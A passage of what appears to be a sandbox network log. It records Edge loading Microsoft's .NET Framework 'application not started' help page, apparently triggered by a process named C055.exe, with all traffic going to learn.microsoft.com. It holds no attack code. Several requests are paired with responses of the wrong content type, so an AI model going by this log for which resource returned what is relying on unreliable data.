etag: "xOsLkugrec8tjl/x5R/P0wEBnbz3WpY5bC0DbBQ7RkA="
vary: Accept-Encoding
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Dynamic
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 20231010T173552Z-9k2umpnu417cr8une89ned84u000000004u000000002u2f8
content-length: 12558
cache-control: public, max-age=600
expires: Tue, 10 Oct 2023 17:45:53 GMT
date: Tue, 10 Oct 2023 17:35:53 GMT
akamai-cache-status: Miss from child, Miss from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/static/third-party/adobe-target/at-js/2.9.0/at.js

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /static/third-party/adobe-target/at-js/2.9.0/at.js HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://learn.microsoft.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: application/javascript
content-encoding: gzip
content-md5: p2plPaqhNrF9OruIDBWWBg==
last-modified: Thu, 30 Mar 2023 19:40:20 GMT
etag: 0x8DB315698C00FE5
x-ms-request-id: e54572c4-501e-0073-7f4e-67bf51000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}{"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=static"}]}{"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0SLUsZAAAAAAzmaciykciRJbMlrdBtIVnQU1TMDRFREdFMTkxNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
x-content-type-options: nosniff
content-length: 33794
vary: Accept-Encoding
cache-control: max-age=23573899
expires: Tue, 09 Jul 2024 13:54:12 GMT
date: Tue, 10 Oct 2023 17:35:53 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/478858f5.site-ltr.css

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /_themes/docs.theme/master/en-us/_themes/styles/478858f5.site-ltr.css HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: text/css
content-length: 68176
content-encoding: gzip
etag: "0x8DBC67A6E9C1A28"
last-modified: Fri, 06 Oct 2023 14:42:14 GMT
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 20231006T144320Z-k022axqd8965h9ztag7ptzp6qw00000001kg00000000f3ch
accept-ranges: bytes
vary: Accept-Encoding
cache-control: public, max-age=248860
expires: Fri, 13 Oct 2023 14:43:33 GMT
date: Tue, 10 Oct 2023 17:35:53 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/global/67a45209.deprecation.js

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /_themes/docs.theme/master/en-us/_themes/global/67a45209.deprecation.js HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 588
content-type: application/javascript
content-encoding: gzip
last-modified: Wed, 04 Oct 2023 17:41:35 GMT
etag: "0x8DBC50127CD24D9"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0sG8eZQAAAAAxxiYAdXAETLP2VcQ6AS2+QU1TMDRFREdFMTgxNwA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=138911
expires: Thu, 12 Oct 2023 08:11:04 GMT
date: Tue, 10 Oct 2023 17:35:53 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/scripts/7a157846.index-docs.js

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /_themes/docs.theme/master/en-us/_themes/scripts/7a157846.index-docs.js HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 611729
content-type: application/javascript
content-encoding: gzip
last-modified: Mon, 09 Oct 2023 21:01:25 GMT
etag: "0x8DBC90AE69C7863"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0SWokZQAAAABd51fnQgIlTpYnRQbmxiHRQlJVMzBFREdFMTAxMgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=530760
expires: Mon, 16 Oct 2023 21:01:53 GMT
date: Tue, 10 Oct 2023 17:35:53 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /static/third-party/MathJax/3.2.2/tex-mml-chtml.js HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://learn.microsoft.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: application/javascript
content-encoding: gzip
content-md5: LgDVHJjbszjoEFTyQOHesg==
last-modified: Wed, 20 Sep 2023 23:31:57 GMT
etag: 0x8DBBA31C829D526
x-ms-request-id: 46f6f1ff-601e-0013-232a-f2fdd8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
x-azure-ref-originshield: 0WKwVZQAAAAA3Esd26EFaSo+eaMvCT+R0QU1TMDRFREdFMTgwNgA0NGU4ZTUwNy00YmE1LTRiNzAtODcwYS0yODA4NDM4ZDZiMmI=
access-control-allow-origin: *
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}{"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=static"}]}{"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0WKwVZQAAAACZkpucdi9lQogXOsGBmhSBQlJVMzBFREdFMTExMAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
x-content-type-options: nosniff
content-length: 265844
vary: Accept-Encoding
cache-control: max-age=30495870
expires: Fri, 27 Sep 2024 16:40:23 GMT
date: Tue, 10 Oct 2023 17:35:53 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: image/png
content-length: 35005
etag: "0x8D8E3CB30F4C3E2"
last-modified: Wed, 10 Mar 2021 13:48:31 GMT
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 20230628T081959Z-kxtvra8dxd7c71tecefzzq90a000000001ng000000013q0b
accept-ranges: bytes
cache-control: public, max-age=917
expires: Tue, 10 Oct 2023 17:51:11 GMT
date: Tue, 10 Oct 2023 17:35:54 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 15427
content-type: image/png
last-modified: Wed, 10 Mar 2021 13:48:40 GMT
etag: "0x8D8E3CB365AA10A"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0pMclYwAAAAC08MbzHIU5RIOVPY0St1FxQlJVMzBFREdFMDQxMQA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=886
expires: Tue, 10 Oct 2023 17:50:40 GMT
date: Tue, 10 Oct 2023 17:35:54 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/content-nav/MSDocsHeader-DotNet.json? HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 874
content-type: application/json
content-encoding: gzip
last-modified: Fri, 04 Aug 2023 16:48:26 GMT
etag: "0x8DB950A9F96B229"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0GGTRZAAAAADnHxz+yJAGRZvE4cn0SLgVQU1TMDRFREdFMTgxNwA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=236
expires: Tue, 10 Oct 2023 17:39:50 GMT
date: Tue, 10 Oct 2023 17:35:54 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/toc.json

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/toc.json HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 18367
content-type: image/png
last-modified: Wed, 10 Mar 2021 13:48:36 GMT
etag: "0x8D8E3CB3429357A"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0ClBaZAAAAABIOmtgHPgtSLwjGUqaEPMqTE9OMjEyMDUwNzE3MDIxADcxNjg5MjBlLTlmNWItNGE2Mi1iMTZlLWQ1YmU2M2NlNjFlNw==
cache-control: public, max-age=658
expires: Tue, 10 Oct 2023 17:46:52 GMT
date: Tue, 10 Oct 2023 17:35:54 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/breadcrumb/toc.json HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 13842
content-type: image/png
last-modified: Wed, 10 Mar 2021 13:48:26 GMT
etag: "0x8D8E3CB2E2E71C7"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0nrhhZAAAAAC/rPHwMgTHTbFwczlS6ZH2RlJBMzFFREdFMDMwMwA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=779
expires: Tue, 10 Oct 2023 17:48:53 GMT
date: Tue, 10 Oct 2023 17:35:54 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 301

location: /en-us/media/logos/logo_net.svg
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0eYslZQAAAACMVOj84FMnSbmPeuiadaigQlJVMzBFREdFMTAxNQA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 0
cache-control: no-cache, no-store
expires: Tue, 10 Oct 2023 17:35:54 GMT
date: Tue, 10 Oct 2023 17:35:54 GMT
akamai-cache-status: Redirect from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 13339
content-type: image/png
last-modified: Wed, 10 Mar 2021 13:48:35 GMT
etag: "0x8D8E3CB33C8B874"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0pnCMZAAAAADdTbBS7UHnRZ6AZnqhm94IQlJVMzBFREdFMTEyMAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=581
expires: Tue, 10 Oct 2023 17:45:35 GMT
date: Tue, 10 Oct 2023 17:35:54 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/install/media/application-not-started/install-3-5.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 4814
content-type: application/json
content-encoding: gzip
last-modified: Wed, 27 Sep 2023 23:32:01 GMT
etag: "0x8DBBFB1F37EB5B9"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 06r0WZQAAAACBkVeWAo5GQJjdukDu+Me6QU1TMDRFREdFMTkyMgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=294
expires: Tue, 10 Oct 2023 17:40:48 GMT
date: Tue, 10 Oct 2023 17:35:54 GMT
akamai-cache-status: RefreshHit from child, Hit from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/media/logos/logo_net.svg

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /media/logos/logo_net.svg HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 6943
content-type: application/json
content-encoding: gzip
last-modified: Wed, 27 Sep 2023 23:31:55 GMT
etag: "0x8DBBFB1EFF5709E"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0ar4WZQAAAAAlJ4z8xhHwQqzM1ssQe8wqQlJVMzBFREdFMDcxNwA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=508
expires: Tue, 10 Oct 2023 17:44:22 GMT
date: Tue, 10 Oct 2023 17:35:54 GMT
akamai-cache-status: RefreshHit from child, Hit from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
POST

https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch

msedge.exe

Remote address:

104.85.2.139:443

Request

POST /api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch HTTP/2.0
host: learn.microsoft.com
content-length: 153
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
